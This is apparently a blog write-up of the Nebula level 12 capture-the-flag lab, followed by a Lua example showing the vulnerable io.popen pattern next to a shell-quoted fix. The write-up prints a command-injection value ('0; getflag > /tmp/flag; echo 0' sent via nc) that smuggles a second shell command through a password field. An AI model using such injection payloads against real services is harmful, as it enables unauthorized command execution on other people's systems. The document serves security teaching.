"Whatever Pages"

20xx-A1-Injection

Nebula 12 Agenda: “There is a backdoor process listening on port 50001”


This one is pretty easy: it contains an injection flaw. The vulnerability arises when a raw, unvalidated input string is passed to the “hash” function as its “password” argument. Lua's io.popen facility runs the command sequence in a separate process, so we can inject our own command:

level12@nebula:~$ echo "0; getflag > /tmp/flag; echo 0" | nc localhost 50001
Password: Better luck next time
level12@nebula:~$ cat /tmp/flag
You have successfully executed getflag on a target account

Injected this way, the input also doesn't break the execution chain. “Voila”!
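
For the fix side, here is an added example (not the level's source code) that puts the vulnerable command construction next to a quoted one and prints what the shell would receive for the input used above. It assumes hash() builds a shell pipeline ending in sha1sum; the names unsafe_cmd, shell_quote and safe_cmd are hypothetical.

```lua
-- Added example, not the level's source code. Assumption: hash() builds a
-- shell pipeline ending in sha1sum; the write-up only says that the password
-- reaches io.popen unfiltered.

-- Vulnerable pattern: input is concatenated into the string that io.popen
-- passes to /bin/sh, so ';' in the input starts a new command.
local function unsafe_cmd(password)
  return "echo " .. password .. " | sha1sum"
end

-- Quote a value for POSIX sh: nothing is special inside single quotes, and
-- an embedded ' is written as '\'' (close, escaped quote, reopen).
local function shell_quote(s)
  if s:find("\0", 1, true) then
    error("NUL byte in input") -- would truncate the C string given to popen
  end
  return "'" .. (s:gsub("'", "'\\''")) .. "'"
end

local function safe_cmd(password)
  -- printf '%s' also avoids echo treating input such as "-n" as an option
  return "printf '%s' " .. shell_quote(password) .. " | sha1sum"
end

-- Hardened hash(): same pipeline, but the input stays one literal argument.
local function hash(password)
  local prog = assert(io.popen(safe_cmd(password), "r"))
  local data = prog:read("*a")
  prog:close()
  return data:sub(1, 40)
end

-- The input from the session above, plus a constructed one with a quote.
for _, input in ipairs({ "0; getflag > /tmp/flag; echo 0", "it's; id" }) do
  print("unsafe: " .. unsafe_cmd(input)) -- printed only, never executed
  print("safe:   " .. safe_cmd(input))
  print("sha1:   " .. hash(input))
end
```

Hashing in-process with a SHA-1 library removes the shell from the path altogether; quoting is the minimal fix when the external command has to stay.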